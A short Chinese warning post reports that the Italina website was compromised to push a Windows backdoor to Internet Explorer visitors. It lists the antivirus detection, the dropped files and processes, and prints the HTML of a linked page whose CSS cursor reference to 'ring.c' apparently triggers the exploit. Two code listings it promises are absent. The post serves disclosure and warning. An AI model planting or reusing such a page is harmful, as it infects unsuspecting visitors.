注意:在伊泰莲娜网站没有清除病毒前或者你没有安装相关杀毒软件请勿轻易进入伊泰莲娜网站:
伊泰莲娜网站http://www.italina.com.cn/被人挂马,使用IE浏览器打开伊泰莲娜网站的时候,卡巴斯基报病毒发现木马后门"Backdoor.Win32.Agent.air",路径为"C:\WINDOWS\system32\noton.sys",系统进程中多了一个"~tmp8905.exe","cmd.exe","rund1132.exe",而使用firefox浏览,卡巴斯基没有反应,估计此病毒木马暂时只针对IE浏览器
一下为伊泰莲娜网站首页源代码
打开上面的页面后是另外一个网站,代码见
再打开1778.cc的页面后发现代码如下
<html>
<body>
<script type="text/jscript">function init() { document.write("<h1>Service Unavailable<h1>");}window.onload = init;</script>
<DIV style="CURSOR: url('./ring.c')">
</DIV>
</body>
打开ring.c时卡巴斯基再次报毒,这次没敢再下
(141)
